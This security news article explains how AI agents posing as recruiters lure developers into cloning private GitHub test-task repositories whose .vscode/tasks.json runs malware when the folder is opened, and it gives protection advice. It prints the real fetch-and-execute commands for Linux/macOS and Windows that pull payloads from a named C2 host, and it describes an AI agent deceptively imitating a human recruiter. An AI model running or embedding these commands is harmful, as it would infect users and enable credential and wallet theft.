Back to Home

How AI Agents Infect Developers via GitHub

A new fraud scheme using AI agents for automated scamming of developers through recruiting platforms is examined. The infection mechanism via private GitHub repositories with malware in .vscode/tasks.json is described, and practical protection recommendations are provided.

AI Scam on GitHub: How Not to Become a Victim Through a Test Task
Advertisement 728x90

# AI Agents in Recruiting Scams: How They Infect via Private Repositories

Scammers have started using AI agents to automate attacks on developers via platforms like Habr Career. Instead of manual messaging, thousands of candidates now receive personalized job offers with test tasks containing hidden malicious code. The main vector is private GitHub repositories with auto-launching tasks in VSCode.

How the New Attack Scheme Works

The attacker registers an account on a recruiting platform and sets up an AI agent that parses developer profiles. Based on the stack (e.g., React + Node.js + Web3), it generates a convincing job description and conducts a dialogue mimicking a live HR. The agent avoids instant replies, makes "human-like" typos, and communicates only during business hours—all to build trust.

After the candidate agrees to the test task, they're added to a private repository on GitHub. This is key: public repositories quickly get flagged by security scanners, while private ones stay under the radar until cloned.

Google AdInline article slot

Hidden Payload in .vscode/

Inside the repository is a standard fullstack structure: React frontend, Express backend, PostgreSQL database, Firebase authentication, Stripe integration. The code looks legit even on a superficial review. However, the malicious component is hidden in the .vscode/ directory.

The tasks.json file contains a task with the parameter:

"runOn": "folderOpen"

This makes VSCode automatically run the command when opening the project folder. A notification pops up at the bottom of the interface, but most developers ignore it since such tasks are common for building projects.

Google AdInline article slot

Commands vary by OS:

Linux / macOS:

curl -fsSL -A 101 https://ping-i2eo.onrender.com/nvs | bash

Windows:

Google AdInline article slot
curl -sk -A 100 -o %TEMP%\i.ini https://ping-i2eo.onrender.com/nvs
.\ .vscode\snippets\argv.exe x -ppppppp %TEMP%\i.ini -o%TEMP%
wscript.exe %TEMP%\vs9extensions\update.vbs

Components of the Malicious Infrastructure

The attack leverages several technical elements:

  • C2 server: ping-i2eo.onrender.com hosted on free Render.com. The /nvs endpoint delivers a dynamic shell script. User-Agent (100, 101, 102) identifies the victim's OS.
  • Binary argv.exe: PE32 file (579 KB) in .vscode/snippets/, used to unpack an encrypted payload on Windows.
  • Obfuscated JS: .vscode/lock file (753 KB) with one-line JavaScript, likely for persistence or data theft in Unix environments.
  • Fake credentials: server/config/default.json contains plaintext real API keys (Cloudflare, S3/R2, email) to lend legitimacy to the project.

Attack Goals and Consequences

The exact payload is unknown since it's dynamically loaded from the C2 server. However, typical targets include:

  • Stealing SSH keys from ~/.ssh/
  • Extracting .env files and tokens from other projects
  • Hijacking browser cookies and saved passwords
  • Installing a cryptominer
  • Planting a backdoor or reverse shell for persistent access

Web3 developers are especially vulnerable: their machines often hold seed phrases, private keys, and wallets providing direct access to crypto assets.

Why the Attack Failed This Time

Two factors prevented infection:

  • VSCode setting task.allowAutomaticTasks: off — completely blocks automatic workspace task execution without explicit confirmation.
  • Opening the repository in WSL terminal, not the GUI VSCode version. The runOn: folderOpen parameter only triggers when opening the folder via the desktop app.

Red Flags When Dealing with Recruiters

Watch for these warning signs:

  • AI simulating a human: deliberate typos, replies only during business hours, dodging specifics. Requests for project details yield vague, templated "startup slop."
  • Overly precise job personalization matching your exact stack, especially from a low-activity account.
  • Private repository for the test task without code preview option.
  • Presence of .vscode/tasks.json with "runOn": "folderOpen" — legitimate test tasks don't require auto-launching scripts.

Key Takeaways

  • Disable automatic task execution in VSCode: Go to Settings → search for task.allowAutomaticTasks → set to off.
  • Always inspect repository contents in the GitHub web interface before cloning, especially .vscode/ files.
  • Don't blindly trust private repositories — they're commonly used to evade malware detection systems.
  • Web3 developers are prime targets: Isolate wallets and keys from your main workspace.
  • AI agents slash scam costs: A single system can process thousands of profiles, enabling mass-scale yet highly personalized attacks.

— Editorial Team

Advertisement 728x90

Read Next